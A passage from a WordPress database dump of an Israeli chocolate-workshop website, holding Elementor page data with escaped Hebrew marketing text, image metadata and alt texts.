\\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-employees\\/\\\"><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd<\\/u><\\/a> \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/birthday-chocolate-workshop\\/\\\"><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea<\\/u><\\/a> \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/kosher-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/a> \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<br \\/>\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0 \\u05d2\\u05dd \\u05d1\\u05e1\\u05d8\\u05d5\\u05d3\\u05d9\\u05d5.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2078,407,'_elementor_controls_usage','a:0:{}'),(2079,407,'_elementor_edit_mode','builder'),(2080,407,'_elementor_template_type','wp-page'),(2081,407,'_elementor_version','2.7.5'),(2082,407,'_elementor_pro_version','2.7.3'),(2083,407,'_wp_page_template','default'),(2084,407,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2085,407,'_elementor_data','[]'),(2097,409,'_elementor_controls_usage','a:0:{}'),(2098,409,'_elementor_edit_mode','builder'),(2099,409,'_elementor_template_type','wp-page'),(2100,409,'_elementor_version','2.7.5'),(2101,409,'_elementor_pro_version','2.7.3'),(2102,409,'_wp_page_template','default'),(2103,409,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2104,409,'_elementor_data','[{\"id\":\"74852ca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee128e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0faa7f1\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05db\\u05dc \\u05e1\\u05d6\\u05d2\\u05d9 \\u05d4\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ec0228e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2116,411,'_wp_attached_file','2019/12/Depositphotos_23615471_s-2019-1.jpg'),(2117,411,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:43:\"2019/12/Depositphotos_23615471_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Depositphotos_23615471_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Depositphotos_23615471_s-2019-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"Depositphotos_23615471_s-2019-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:43:\"Depositphotos_23615471_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2118,411,'_wp_attachment_image_alt','סדנת שוקולד לילדים'),(2119,335,'_wp_attachment_image_alt','סדנאות שוקולד'),(2120,307,'_wp_attachment_image_alt','סדנאות שוקולד'),(2121,301,'_wp_attachment_image_alt','סדנאות שוקולד לילדים'),(2122,274,'_wp_old_slug','%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9e%d7%a7%d7%95%d7%a8-%d7%9c%d7%90%d7%a0%d7%a8%d7%92%d7%99%d7%94-%d7%95%d7%9b%d7%9c-%d7%96%d7%94-%d7%9c%d7%9c%d7%90-%d7%97%d7%9c%d7%91%d7%95%d7%a0%d7%99%d7%9d'),(2123,271,'_wp_old_slug','%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%95%d7%aa%d7%96%d7%95%d7%a0%d7%94-%d7%9c%d7%90%d7%97%d7%a8-%d7%90%d7%99%d7%9e%d7%95%d7%9f'),(2124,190,'_wp_attachment_image_alt','סדנאות שוקולד'),(2125,183,'_wp_attachment_image_alt','סדנת שוקולד למבוגרים'),(2126,177,'_wp_attachment_image_alt','סדנאות שוקולד'),(2127,154,'_wp_attachment_image_alt','סדנאות שוקולד'),(2128,135,'_wp_attachment_image_alt','סדנאות שוקולד לילדים'),(2129,125,'_wp_attachment_image_alt','סדנאות שוקולד לילדים'),(2130,104,'_wp_attachment_image_alt','סדנאות שוקולד'),(2131,97,'_wp_attachment_image_alt','סדנת שוקולד למסיבת רווקות'),(2132,91,'_wp_attachment_image_alt','סדנאות שוקולד'),(2133,76,'_wp_attachment_image_alt','סדנת שוקולד זוגית'),(2134,35,'_wp_attachment_image_alt','סדנאות שוקולד'),(2135,33,'_wp_attachment_image_alt','סדנאות שוקולד'),(2136,32,'_wp_attachment_image_alt','סדנץ שוקולד זוגית'),(2137,31,'_wp_attachment_image_alt','סדנאות שוקולד למבוגרים'),(2138,30,'_wp_attachment_image_alt','סדנאות שוקולד לילדים'),(2139,28,'_wp_attachment_image_alt','סדנאות שוקולד'),(2140,24,'_wp_attachment_image_alt','סדנאות שוקולד'),(2142,412,'_elementor_edit_mode','builder'),(2143,412,'_elementor_template_type','wp-page'),(2144,412,'_elementor_version','2.7.5'),(2145,412,'_elementor_pro_version','2.7.3'),(2146,412,'_wp_page_template','elementor_header_footer'),(2147,412,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2148,412,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd 